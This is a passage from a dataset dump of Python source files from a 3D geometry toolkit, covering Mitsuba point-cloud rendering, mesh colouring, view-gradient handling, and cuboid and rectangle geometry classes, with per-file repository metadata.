"text": "__author__ = \"Panos Achlioptas, Lin Shao, 2017.\"\n\nimport os\nimport numpy as np\nimport shutil\nimport os.path as osp\nimport matplotlib.pyplot as plt\n\nfrom geo_tool.in_out.soup import load_wavefront_obj, load_ply\nfrom geo_tool import Point_Cloud\n\nfrom general_tools.in_out import create_dir\nfrom general_tools.strings import trim_content_after_last_dot\nfrom general_tools.plotting.colors import rgb_to_hex_string\n\n\nclass Mitsuba_Rendering(object):\n\n def __init__(self, command_file, model_list, img_out_dir, temp_dir, dependencies_dir, clean_temp=False):\n ''' Initializer of Class instance.\n Input:\n command_file : file_name where the commands calling Mitsuba will be written.\n model_list: a list containing the file_names of the models that will be rendered.\n img_out_dir: where the rendered files will be saved.\n temp_dir : Mitsuba will store here intermediate results.\n dependencies_dir: holds files like: envmap.exr, matpreview.serialized that are necessary for rendering.\n clean_temp: if True, post rendering all intermediate results will be deleted.\n\n Assumes Mitsuba is installed and can be accessed in a terminal with 'mitsuba'. Similarly, 'mtsutil' can be called from the command line.\n '''\n\n self.command_file = command_file\n self.img_out_dir = img_out_dir\n self.temp_dir = temp_dir\n self.model_list = model_list\n self.clean_temp = clean_temp\n self.set_default_rendering_params()\n\n create_dir(self.temp_dir)\n create_dir(self.img_out_dir)\n shutil.copy(os.path.join(dependencies_dir, 'envmap.exr'), self.temp_dir)\n shutil.copy(os.path.join(dependencies_dir, 'matpreview.serialized'), self.temp_dir)\n\n def set_default_rendering_params(self):\n self.sphere_radius = 0.015 # Size of rendered sphere (of point-clouds).\n self.ldsampler_n_samples = 128 # Controls the quality of the rendering, higher is better.\n\n self.z_rot_degrees = 0 # Rotate object along z-axis before render it.\n\n self.backdrop_size = 10 # Backdrop is the white cloth put in professional photo-shooting as background.\n self.backdrop_x_pos = 0\n self.backdrop_y_pos = 5\n self.backdrop_z_pos = 0 # This is relative and it will be added to the minimum point of the physical object that is rendered to\n # decide the z position of the backdrop.\n\n self.sensor_origin = [0, -2.5, 0.5] # Where is the sensor/camera being placed in [x,y,z] space.\n self.sensor_target = [0, 0, 0] # Where the sensor is pointed to.\n self.sensor_up = [0, 0, 1]\n self.sensor_focus_distance = 2.3173\n\n self.sensor_height = 480 # img_out dimensions\n self.sensor_width = 480\n\n def pc_loader(self, file_name, normalize=True, load_color=False):\n if file_name[-4:] == '.ply':\n if load_color:\n points, color = load_ply(file_name, with_color=True)\n pc = Point_Cloud(points)\n else:\n pc = Point_Cloud(ply_file=file_name)\n color = None\n\n if normalize:\n pc.center_in_unit_sphere()\n pc.rotate_z_axis_by_degrees(self.z_rot_degrees, clockwise=False)\n\n return pc, color\n\n def generate_commands_for_point_cloud_rendering(self, color_per_point=False):\n command = ''\n for model_file in self.model_list:\n pcloud, colors = self.pc_loader(model_file, load_color=color_per_point)\n pc_z_min = np.min(pcloud.points[:, 2])\n\n model_name = trim_content_after_last_dot(osp.basename(model_file))\n xml_file = os.path.join(self.temp_dir, model_name + '.xml')\n\n with open(xml_file, 'w') as xml_out:\n xml_out.write(self.xml_string(pc_z_min))\n if colors is not None:\n for i, point in enumerate(pcloud.points):\n xml_out.write(self.xml_point_string(self.sphere_radius, point, colors[i]))\n else:\n for point in pcloud.points:\n xml_out.write(self.xml_point_string(self.sphere_radius, point))\n\n xml_out.write(self.xml_closure())\n\n img_file = os.path.join(self.img_out_dir, model_name + '.png')\n exr_file = os.path.join(self.temp_dir, model_name + '.exr')\n\n command += 'mitsuba %s\\n' % xml_file\n command += 'mtsutil tonemap -o %s %s\\n\\n' % (img_file, exr_file)\n\n with open(self.command_file, 'w') as fout:\n fout.write(command)\n if self.clean_temp:\n command = 'rm mitsuba*.log\\n'\n# command += 'rm -rf %s\\n' % (self.temp_dir, )\n fout.write(command)\n\n try:\n os.system(\"chmod +x %s\" % (self.command_file, ))\n except:\n pass\n\n def xml_string(self, pc_z_min):\n return self.xml_preamble() + self.xml_sensor() + self.xml_emitter() + self.xml_backdrop(pc_z_min)\n\n def xml_point_string(self, sphere_radius, position, color=None):\n if color is not None:\n r, g, b = color\n color_value = rgb_to_hex_string(r, g, b)\n else:\n color_value = '#6d7185'\n\n out_str = '<shape type=\"sphere\">\\n'\n out_str += '\\t<float name=\"radius\" value=\"%f\"/>\\n' % (sphere_radius, )\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (position[0], position[1], position[2])\n out_str += '\\t</transform>\\n'\n out_str += '\\t<bsdf type=\"diffuse\">\\n'\n out_str += '\\t\\t<srgb name=\"diffuseReflectance\" value=\"%s\"/>\\n' % (color_value, )\n out_str += '\\t</bsdf>\\n'\n out_str += '</shape>\\n\\n'\n\n return out_str\n\n def xml_preamble(self):\n out_str = '<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n\\n'\n out_str += '<scene version=\"0.5.0\">\\n'\n out_str += '\\t<!--Setup scene integrator -->\\n'\n out_str += '\\t<integrator type=\"path\">\\n'\n out_str += '\\t\\t<!-- Path trace with a max. path length of 5 -->\\n'\n out_str += '\\t\\t<integer name=\"maxDepth\" value=\"5\"/>\\n'\n out_str += '\\t</integrator>\\n\\n'\n return out_str\n\n def xml_sensor(self):\n out_str = '<sensor type=\"perspective\">\\n'\n out_str += '\\t<float name=\"focusDistance\" value=\"%f\"/>\\n' % self.sensor_focus_distance\n out_str += '\\t<float name=\"fov\" value=\"45\"/>\\n'\n out_str += '\\t<string name=\"fovAxis\" value=\"x\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n\n out_str += '\\t\\t<lookat target=\"%f, %f, %f\" origin=\"%f, %f, %f\" up=\"%f, %f, %f\"/>\\n' \\\n % (self.sensor_target[0], self.sensor_target[1], self.sensor_target[2], self.sensor_origin[0], \\\n self.sensor_origin[1], self.sensor_origin[2], self.sensor_up[0], self.sensor_up[1], self.sensor_up[2])\n\n out_str += '\\t</transform>\\n'\n out_str += '\\t<sampler type=\"ldsampler\">\\n'\n out_str += '\\t\\t<integer name=\"sampleCount\" value=\"%d\"/>\\n' % self.ldsampler_n_samples\n out_str += '\\t</sampler>\\n'\n out_str += '\\t<film type=\"hdrfilm\">\\n'\n out_str += '\\t\\t<integer name=\"height\" value=\"%i\"/>\\n' % self.sensor_height\n out_str += '\\t\\t<integer name=\"width\" value=\"%i\"/>\\n' % self.sensor_width\n out_str += '\\t\\t<rfilter type=\"gaussian\"/>\\n'\n out_str += '\\t</film>\\n'\n out_str += '</sensor>\\n\\n'\n return out_str\n\n def xml_emitter(self):\n out_str = '<emitter type=\"envmap\" id=\"Area_002-light\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"envmap.exr\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<rotate y=\"1\" angle=\"-180\"/>\\n'\n out_str += '\\t\\t<matrix value=\"-0.224951 -0.000001 -0.974370 0.000000 -0.974370 0.000000 0.224951 0.000000 0.000000 1.000000 -0.000001 8.870000 0.000000 0.000000 0.000000 1.000000\"/>\\n'\n out_str += '\\t</transform>\\n'\n out_str += '\\t<float name=\"scale\" value=\"3\"/>\\n'\n out_str += '</emitter>\\n\\n'\n return out_str\n\n def xml_obj(self, obj_filename, position=[0, 0, 0]):\n out_str = '<shape type=\"obj\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"%s\"/>\\n' % obj_filename\n out_str += '\\t<transform name=\"toWorld\" >\\n'\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (position[0], position[1], position[2])\n out_str += '\\t</transform >\\n'\n out_str += '\\t<bsdf type=\"diffuse\" >\\n'\n out_str += '\\t\\t<srgb name=\"diffuseReflectance\" value=\"#6d7185\"/>\\n'\n out_str += '\\t</bsdf>\\n'\n out_str += '</shape>\\n'\n return out_str\n\n def xml_backdrop(self, pc_z_min):\n ''' backdrop is the white colored cloth that is used when photo-shooting and acts like the background.\n In Mitsuba we add such an object along with our object of interest to help rendering the latter.\n '''\n out_str = '<texture type=\"checkerboard\" id=\"__planetex\">\\n'\n out_str += '\\t<rgb name=\"color0\" value=\"0.9\"/>\\n'\n out_str += '\\t<rgb name=\"color1\" value=\"0.9\"/>\\n'\n out_str += '\\t<float name=\"uscale\" value=\"8.0\"/>\\n'\n out_str += '\\t<float name=\"vscale\" value=\"8.0\"/>\\n'\n out_str += '\\t<float name=\"uoffset\" value=\"0.0\"/>\\n'\n out_str += '\\t<float name=\"voffset\" value=\"0.0\"/>\\n'\n out_str += '</texture>\\n\\n'\n\n out_str += '<bsdf type=\"diffuse\" id=\"__planemat\">\\n'\n out_str += '\\t<ref name=\"reflectance\" id=\"__planetex\"/>\\n'\n out_str += '</bsdf>\\n\\n'\n\n out_str += '<shape type=\"serialized\" id=\"Plane-mesh_0\">\\n'\n out_str += '\\t<string name=\"filename\" value=\"matpreview.serialized\"/>\\n'\n out_str += '\\t<integer name=\"shapeIndex\" value=\"0\"/>\\n'\n out_str += '\\t<transform name=\"toWorld\">\\n'\n out_str += '\\t\\t<scale x=\"%f\" y=\"%f\" z=\"%f\"/>\\n' % (self.backdrop_size, self.backdrop_size, self.backdrop_size)\n out_str += '\\t\\t<translate x=\"%f\" y=\"%f\" z=\"%f\" />\\n' % (self.backdrop_x_pos, self.backdrop_y_pos, self.backdrop_z_pos + pc_z_min)\n out_str += '\\t</transform>\\n'\n out_str += '\\t<ref name=\"bsdf\" id=\"__planemat\"/>\\n'\n out_str += '</shape>\\n\\n'\n return out_str\n\n def xml_closure(self):\n return '</scene>\\n'\n\n\n# def obj_commands(self):\n# self.num_commands = len(self.model_list)\n# fw_command = open(os.path.join(self.command_dir, 'command.sh'), 'w')\n# for i in xrange(self.num_commands):\n# obj_filename = os.path.join(self.model_list, self.model_list[i] + self.file_extension)\n# points, faces = self.obj_loader(obj_filename)\n# points = points.dot(self.rotation_mat().transpose())\n# xml_path = os.path.join(self.temp_dir, self.model_list[i]+'.xml')\n# exr_path = os.path.join(self.temp_dir, self.model_list[i]+'.exr')\n# img_path = os.path.join(self.img_out_dir, self.model_list[i]+'.png')\n# fw_exr = open(exr_path,'w')\n# fw_exr.close()\n# fw_xml = open(xml_path, 'w')\n# fw_xml.write(self.xml_string(-0.5))\n# fw_xml.write(self.xml_obj(obj_filename))\n# fw_xml.write(self.xml_post())\n# fw_xml.close()\n# command = 'mitsuba %s\\n' % xml_path\n# command += 'mtsutil tonemap -o %s %s\\n' % (img_path, exr_path)\n# fw_command.write(command)\n# fw_command.close(\n\n\n# def obj_loader(self, file_name):\n# vertices, faces, normals = load_wavefront_obj(file_name)\n# v_np = np.zeros((len(vertices),3))\n# for i in xrange(len(vertices)):\n# v_np[i,:] = vertices[i]\n# return v_np, faces"
},
{
"alpha_fraction": 0.6813746094703674,
"alphanum_fraction": 0.6907085180282593,
"avg_line_length": 31.28767204284668,
"blob_id": "60d4085ceba6366aa8ec6154a982dc184327612b",
"content_id": "6cae041c75815c4e05e67f78f78991af6c452522",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2357,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 73,
"path": "/scripts/extract_intrinsic_color.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 15, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any\n way you want for non-commercial purposes. \n'''\n\nimport sys\nimport os.path as osp\nimport matplotlib.pyplot as plt\n\n\nfrom nn_saliency.src.mesh import Mesh\nfrom nn_saliency.src.laplace_beltrami import Laplace_Beltrami\nfrom nn_saliency.src.back_tracer import Back_Tracer\nimport nn_saliency.src.nn_io as nn_io\nimport nn_saliency.src.mesh_cleaning as cleaning\nfrom multiprocessing import Pool\nfrom subprocess import call as sys_call\n\npercent_of_eigs = 0.15\nmin_eigs = 7\nmax_eigs = 500\ntime_horizon = 20\nmin_vertices = 7\n\ncmap = plt.get_cmap('jet')\n\nglobal top_in_dir\nglobal out_dir\nfythumb_bin = '/home/panos/Renderer/a/b/fythumb_mvcnn/build/fythumb'\n\n\ndef render_views_with_fythumb(mesh_file, output_dir):\n sys_call([fythumb_bin, '-i', mesh_file, '-o', output_dir, '-r'])\n\n\ndef extract_hks_color(off_file):\n in_mesh = Mesh(off_file)\n in_mesh.center_in_unit_sphere()\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n in_lb = Laplace_Beltrami(in_mesh)\n v_color = in_mesh.color_via_hks_of_component_spectra(in_lb, percent_of_eigs, time_horizon, min_vertices, min_eigs, max_eigs)\n v_color = in_mesh.adjacency_matrix().dot(v_color)\n v_color = cmap(v_color)\n out_file = off_file.replace(top_in_dir, out_dir)\n nn_io.write_off(out_file, in_mesh.vertices, in_mesh.triangles, vertex_color=v_color)\n\n\ndef extract_parts_color(off_file):\n in_mesh = Mesh(off_file)\n cleaning.clean_mesh(in_mesh, level=3, verbose=False)\n _, node_labels = in_mesh.connected_components()\n v_color = cmap(node_labels)\n out_file = off_file.replace(top_in_dir, out_dir)\n nn_io.write_off(out_file, in_mesh.vertices, in_mesh.triangles, vertex_color=v_color)\n views_out_dir = off_file.replace(top_in_dir, out_dir)[:-4]\n render_views_with_fythumb(out_file, views_out_dir)\n\nif __name__ == '__main__':\n top_in_dir = osp.abspath(sys.argv[1])\n out_dir = osp.abspath(sys.argv[2])\n nn_io.copy_folder_structure(top_in_dir, out_dir)\n off_files = nn_io.files_in_subdirs(top_in_dir, '\\.off$')\n\n pool = Pool(processes=6)\n for i, off_file in enumerate(off_files):\n print off_file\n pool.apply_async(extract_parts_color, args=(off_file,))\n pool.close()\n pool.join()\n"
},
{
"alpha_fraction": 0.7924528121948242,
"alphanum_fraction": 0.7924528121948242,
"avg_line_length": 26,
"blob_id": "7221fc1cc7e31b0207312ccd6bee44d9498d94d1",
"content_id": "2e5adddee0aaf275705b2c4a6e7bc8ace2af3bf0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 2,
"path": "/fundamentals/__init__.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "from . graph import Graph\nfrom . cuboid import Cuboid"
},
{
"alpha_fraction": 0.5433287620544434,
"alphanum_fraction": 0.5478482842445374,
"avg_line_length": 38.7578125,
"blob_id": "b85626a327849382a4b071f5648f1962d6a4c84b",
"content_id": "a52eb2cb57aa2acd87d40d515285a68b26a09fd6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5089,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 128,
"path": "/rendering/view_gradients.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jul 25, 2016\n\n@author: Panos Achlioptas\n@contact: [email protected]\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes. \n'''\nimport cv2\nimport copy\nimport os.path as osp\nimport numpy as np\nimport matplotlib.pylab as plt\n\nfrom . collections import defaultdict\nfrom . shape_views import Shape_Views\nfrom . back_tracer import Back_Tracer\nfrom .. in_out import soup as nn_io\nfrom .. mesh import Mesh\n\n\nclass View_Gradients(object):\n '''\n classdocs\n '''\n def __init__(self, shape_views, grad_file):\n '''\n Constructor\n '''\n self.shape_views = shape_views\n self.grads = np.squeeze(np.load(grad_file)['arr_0'])\n \n if self.shape_views.num_views() != self.size(): # gradients is a tensor whose first dim==nun_views\n raise ValueError\n \n def size(self):\n return self.grads.shape[0]\n \n def __iter__(self):\n return self.grads.__iter__()\n \n def __next__(self):\n return self.grads.__next__()\n \n def camera_position(self, grad_id):\n return self.shape_views.cam_pos[grad_id]\n \n def resize(self, new_size):\n new_grads = np.empty(shape=((self.size(),) + new_size), dtype=self.grads.dtype) \n for i, old_grad in enumerate(self):\n new_grads[i] = cv2.resize(old_grad, new_size) \n self.grads = new_grads\n \n def clean_grad_outside_shape_mask(self, inline=True):\n if inline:\n new_self = self \n else:\n new_self = self.copy() \n \n views_mask = new_self.shape_views.masks \n dims = views_mask.shape \n grad_mask_cleaned = new_self.grads.flatten() # TODO this is pointer, right?\n# mass_outside = sum(abs(grad_mask_cleaned[~views_mask.flatten()]))\n# mass_inside = sum(abs(grad_mask_cleaned[views_mask.flatten()]))\n# print mass_outside, mass_inside\n grad_mask_cleaned[views_mask.flatten()==0] = 0\n grad_mask_cleaned = np.reshape(grad_mask_cleaned, dims) \n new_self.grads = grad_mask_cleaned \n return new_self\n \n def transform_grads(self, transformer):\n new_grads = self.copy()\n new_grads.grads = transformer(new_grads.grads) \n return new_grads\n \n def plot_grad(self, vertex_id, twist_id):\n index = self.shape_views.inv_dict[(vertex_id, twist_id)]\n plt.imshow(self.grads[index,:,:])\n plt.show()\n \n def copy(self):\n new_self = copy.copy(self) # Shallow copy all attributes (grads and shape_views) \n new_self.grads = copy.deepcopy(self.grads) # Deep copy the grads. \n return new_self\n \n def push_on_triangles(self, bt):\n aggregates = np.zeros((bt.mesh.num_triangles, 1)) \n missed = defaultdict(list)\n triangles_hit = defaultdict(list) \n for i, g in enumerate(self):\n vertex_id, twist_id = self.camera_position(i)\n y_coord, x_coord = np.where(g != 0)\n if not bt.is_legit_view_and_twist(vertex_id, twist_id): \n raise ValueError('Back_Tracer and View_Gradients don\\'t agree on the set of views.') \n for x,y in zip(x_coord, y_coord):\n try:\n triangle = bt.from_2D_to_3D((x,y), vertex_id, twist_id)\n aggregates[triangle] += g[y, x]\n triangles_hit[(vertex_id, twist_id)].append((triangle))\n \n except: \n missed[(vertex_id, twist_id)].append((x,y)) \n return aggregates, triangles_hit, missed # TODO-Trim.\n \n def export_grads_to_txt(self, save_dir):\n '''\n Exports the grads attribute into .txt files. Each file corresponds to one view (vertex_id, twist_id)\n and lists every pixel where a gradient is positive into a separate line.\n '''\n nn_io.create_dir(save_dir)\n for i, grad in enumerate(self):\n y_coord, x_coord = np.where(grad)\n vertex_id, twist_id = self.camera_position(i) \n out_file = 'grads_' + str(vertex_id) + '_' + str(twist_id) + '.txt'\n out_file = osp.join(save_dir, out_file)\n nn_io.write_pixel_list_to_txt(x_coord, y_coord, out_file)\n \nif __name__ == '__main__':\n in_mesh = Mesh('../Data/Screw/screw.off')\n views = Shape_Views('../Data/Screw/Views', 'png')\n grads = View_Gradients(views, '../Data/Screw/raw_grads.npz') \n rendered_size = (256, 256)\n grads.resize(rendered_size)\n grads.clean_grad_outside_shape_mask()\n \n bt = Back_Tracer('../Data/Screw/Salient_Triangles', in_mesh)\n saliency_scores = np.zeros((in_mesh.num_triangles, 1))\n\n in_mesh.plot(triangle_function=saliency_scores)\n"
},
{
"alpha_fraction": 0.5275957584381104,
"alphanum_fraction": 0.5549139380455017,
"avg_line_length": 43.14215850830078,
"blob_id": "a6103d73f67e9d15cb6d5220fe2b1ff7ab2eebb9",
"content_id": "681cb735c5e05cb8d90486b7c0064a77a0f9d8d0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9005,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 204,
"path": "/fundamentals/cuboid.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 8, 2016\n\n@author: Panos Achlioptas and Lin Shao\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport warnings\nfrom .. utils import linalg_utils as utils\nl2_norm = utils.l2_norm\n\n\nclass Cuboid(object):\n '''\n A class representing a 3D Cuboid.\n '''\n\n def __init__(self, extrema):\n '''\n Constructor.\n Args: extrema (numpy array) containing 6 non-negative integers [xmin, ymin, zmin, xmax, ymax, zmax].\n '''\n self.extrema = extrema\n self.corners = self._corner_points()\n\n def __str__(self):\n return 'Cuboid with [xmin, ymin, zmin, xmax, ymax, zmax] coordinates = %s.' % (str(self.extrema), )\n\n @property\n def extrema(self):\n return self._extrema\n\n @extrema.setter\n def extrema(self, value):\n self._extrema = value\n [xmin, ymin, zmin, xmax, ymax, zmax] = self._extrema\n if xmax == xmin or zmin == zmax or ymax == ymin:\n warnings.warn('Degenerate Cuboid was specified (its volume and/or area are zero).')\n if xmin > xmax or ymin > ymax or zmin > zmax:\n raise ValueError('Check extrema of cuboid.')\n\n def _corner_points(self):\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n c1 = np.array([xmin, ymin, zmin])\n c2 = np.array([xmax, ymin, zmin])\n c3 = np.array([xmax, ymax, zmin])\n c4 = np.array([xmin, ymax, zmin])\n c5 = np.array([xmin, ymin, zmax])\n c6 = np.array([xmax, ymin, zmax])\n c7 = np.array([xmax, ymax, zmax])\n c8 = np.array([xmin, ymax, zmax])\n return np.vstack([c1, c2, c3, c4, c5, c6, c7, c8])\n\n def diagonal_length(self):\n return l2_norm(self.extrema[:3] - self.extrema[3:])\n\n def get_extrema(self):\n ''' Syntactic sugar to get the extrema property into separate variables.\n '''\n e = self.extrema\n return e[0], e[1], e[2], e[3], e[4], e[5]\n\n def volume(self):\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n return (xmax - xmin) * (ymax - ymin) * (zmax - zmin)\n\n def height(self):\n [_, _, zmin, _, _, zmax] = self.extrema\n return zmax - zmin\n\n def intersection_with(self, other):\n [sxmin, symin, szmin, sxmax, symax, szmax] = self.get_extrema()\n [oxmin, oymin, ozmin, oxmax, oymax, ozmax] = other.get_extrema()\n dx = min(sxmax, oxmax) - max(sxmin, oxmin)\n dy = min(symax, oymax) - max(symin, oymin)\n dz = min(szmax, ozmax) - max(szmin, ozmin)\n inter = 0\n\n if (dx > 0) and (dy > 0) and (dz > 0):\n inter = dx * dy * dz\n\n return inter\n\n def barycenter(self):\n n_corners = self.corners.shape[0]\n return np.sum(self.corners, axis=0) / n_corners\n\n def faces(self):\n corners = self.corners\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n xmin_f = corners[corners[:, 0] == xmin, :]\n xmax_f = corners[corners[:, 0] == xmax, :]\n ymin_f = corners[corners[:, 1] == ymin, :]\n ymax_f = corners[corners[:, 1] == ymax, :]\n zmin_f = corners[corners[:, 2] == zmin, :]\n zmax_f = corners[corners[:, 2] == zmax, :]\n return [xmin_f, xmax_f, ymin_f, ymax_f, zmin_f, zmax_f]\n\n def is_point_inside(self, point):\n '''Given a 3D point tests if it lies inside the Cuboid.\n '''\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n return np.all([xmin, ymin, zmin] <= point) and np.all([xmax, ymax, zmax] >= point)\n\n def containing_sector(self, sector_center, ignore_z_axis=True):\n '''Computes the tightest (conic) sector that contains the Cuboid. The sector's center is defined by the user.\n Input:\n sector_center: 3D Point where the sector begins.\n ignore_z_axis: (Boolean) if True the Cuboid is treated as rectangle by eliminating it's z-dimension.\n Notes: Roughly it computes the angle between the ray's starting at the sector's center and each side of the cuboid.\n The one with the largest angle is the requested sector.\n '''\n if self.is_point_inside(sector_center):\n raise ValueError('Sector\\'s center lies inside the bounding box.')\n\n def angle_of_sector(sector_center, side):\n x1, y1, x2, y2 = side\n line_1 = np.array([x1 - sector_center[0], y1 - sector_center[1]]) # First diagonal pair of points of cuboid\n line_2 = np.array([x2 - sector_center[0], y2 - sector_center[1]])\n cos = line_1.dot(line_2) / (l2_norm(line_1) * l2_norm(line_2))\n if cos >= 1 or cos <= -1:\n angle = 0\n else:\n angle = np.arccos(cos)\n assert(angle <= np.pi and angle >= 0)\n return angle\n\n if ignore_z_axis:\n [xmin, ymin, _, xmax, ymax, _] = self.extrema\n sides = [[xmin, ymin, xmax, ymax],\n [xmax, ymin, xmin, ymax],\n [xmin, ymax, xmax, ymax],\n [xmin, ymin, xmax, ymin],\n [xmin, ymin, xmin, ymax],\n [xmax, ymin, xmax, ymax],\n ]\n\n a0 = angle_of_sector(sector_center, sides[0])\n a1 = angle_of_sector(sector_center, sides[1]) # a0, a1: checking the diagonals.\n a2 = angle_of_sector(sector_center, sides[2])\n a3 = angle_of_sector(sector_center, sides[3])\n a4 = angle_of_sector(sector_center, sides[4])\n a5 = angle_of_sector(sector_center, sides[5])\n largest = np.argmax([a0, a1, a2, a3, a4, a5])\n return np.array(sides[largest][0:2]), np.array(sides[largest][2:])\n\n def union_with(self, other):\n return self.volume() + other.volume() - self.intersection_with(other)\n\n def iou_with(self, other):\n inter = self.intersection_with(other)\n union = self.union_with(other)\n return float(inter) / union\n\n def overlap_ratio_with(self, other, ratio_type='union'):\n '''\n Returns the overlap ratio between two cuboids. That is the ratio of their volume intersection\n and their overlap. If the ratio_type is 'union' then the overlap is the volume of their union. If it is min, it\n the min volume between them.\n '''\n inter = self.intersection_with(other)\n if ratio_type == 'union':\n union = self.union_with(other)\n return float(inter) / union\n elif ratio_type == 'min':\n return float(inter) / min(self.volume(), other.volume())\n else:\n ValueError('ratio_type must be either \\'union\\', or \\'min\\'.')\n\n def plot(self, axis=None, c='r'):\n '''Plot the Cuboid.\n Input:\n axis - (matplotlib.axes.Axes) where the cuboid will be drawn.\n c - (String) specifying the color of the cuboid. Must be valid for matplotlib.pylab.plot\n '''\n corners = self.corners\n if axis is not None:\n axis.plot([corners[0, 0], corners[1, 0]], [corners[0, 1], corners[1, 1]], zs=[corners[0, 2], corners[1, 2]], c=c)\n axis.plot([corners[1, 0], corners[2, 0]], [corners[1, 1], corners[2, 1]], zs=[corners[1, 2], corners[2, 2]], c=c)\n axis.plot([corners[2, 0], corners[3, 0]], [corners[2, 1], corners[3, 1]], zs=[corners[2, 2], corners[3, 2]], c=c)\n axis.plot([corners[3, 0], corners[0, 0]], [corners[3, 1], corners[0, 1]], zs=[corners[3, 2], corners[0, 2]], c=c)\n axis.plot([corners[4, 0], corners[5, 0]], [corners[4, 1], corners[5, 1]], zs=[corners[4, 2], corners[5, 2]], c=c)\n axis.plot([corners[5, 0], corners[6, 0]], [corners[5, 1], corners[6, 1]], zs=[corners[5, 2], corners[6, 2]], c=c)\n axis.plot([corners[6, 0], corners[7, 0]], [corners[6, 1], corners[7, 1]], zs=[corners[6, 2], corners[7, 2]], c=c)\n axis.plot([corners[7, 0], corners[4, 0]], [corners[7, 1], corners[0, 1]], zs=[corners[7, 2], corners[4, 2]], c=c)\n axis.plot([corners[0, 0], corners[4, 0]], [corners[0, 1], corners[4, 1]], zs=[corners[0, 2], corners[4, 2]], c=c)\n axis.plot([corners[1, 0], corners[5, 0]], [corners[1, 1], corners[5, 1]], zs=[corners[1, 2], corners[5, 2]], c=c)\n axis.plot([corners[2, 0], corners[6, 0]], [corners[2, 1], corners[6, 1]], zs=[corners[2, 2], corners[6, 2]], c=c)\n axis.plot([corners[3, 0], corners[7, 0]], [corners[3, 1], corners[7, 1]], zs=[corners[3, 2], corners[7, 2]], c=c)\n return axis.figure\n else:\n ValueError('NYI')\n\n @staticmethod\n def bounding_box_of_3d_points(points):\n xmin = np.min(points[:, 0])\n xmax = np.max(points[:, 0])\n ymin = np.min(points[:, 1])\n ymax = np.max(points[:, 1])\n zmin = np.min(points[:, 2])\n zmax = np.max(points[:, 2])\n return Cuboid(np.array([xmin, ymin, zmin, xmax, ymax, zmax]))\n"
},
{
"alpha_fraction": 0.5758196711540222,
"alphanum_fraction": 0.5848360657691956,
"avg_line_length": 31.972972869873047,
"blob_id": "e51d3ad3a12277f1b6e8cc61f2c3017137371e7b",
"content_id": "5911705df168de9f886d535a2fb48bfb955cdded",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2440,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 74,
"path": "/fundamentals/rectangle.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 13, 2016\n\n@author: Panos Achlioptas and Lin Shao\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nfrom .. utils import linalg_utils as utils\nl2_norm = utils.l2_norm\n\n\nclass Rectangle(object):\n '''\n A class representing a 2D rectangle.\n '''\n\n def __init__(self, corners):\n '''\n Constructor.\n corners is a numpy array containing 4 non-negative integers\n describing the [xmin, ymin, xmax, ymax] coordinates of the corners of the\n rectangle.\n '''\n self.corners = corners\n\n def get_corners(self):\n ''' Syntactic sugar to get the corners property into separate variables.\n '''\n c = self.corners\n return c[0], c[1], c[2], c[3]\n\n def area(self):\n c = self.corners\n return (c[2] - c[0]) * (c[3] - c[1])\n\n def intersection_with(self, other):\n [sxmin, symin, sxmax, symax] = self.get_corners()\n [oxmin, oymin, oxmax, oymax] = other.get_corners()\n dx = min(sxmax, oxmax) - max(sxmin, oxmin)\n dy = min(symax, oymax) - max(symin, oymin)\n inter = 0\n if (dx > 0) and (dy > 0):\n inter = dx * dy\n return inter\n\n def diagonal_length(self):\n ''' Returns the length of the diagonal of a rectangle.\n '''\n [xmin, ymin, xmax, ymax] = self.get_corners()\n return l2_norm([xmin - xmax, ymin - ymax])\n\n def union_with(self, other):\n return self.area() + other.area() - self.intersection_with(other)\n\n def iou_with(self, other):\n inter = self.intersection_with(other)\n union = self.union_with(other)\n return float(inter) / union\n\n def overlap_ratio_with(self, other, ratio_type='union'):\n '''\n Returns the overlap ratio between two rectangles. That is the ratio of their area intersection\n and their overlap. If the ratio_type is 'union' then the overlap is the area of their union. If it is min, it\n the min area between them.\n '''\n inter = self.intersection_with(other)\n if ratio_type == 'union':\n union = self.union_with(other)\n return float(inter) / union\n elif ratio_type == 'min':\n return float(inter) / min(self.area(), other.area())\n else:\n 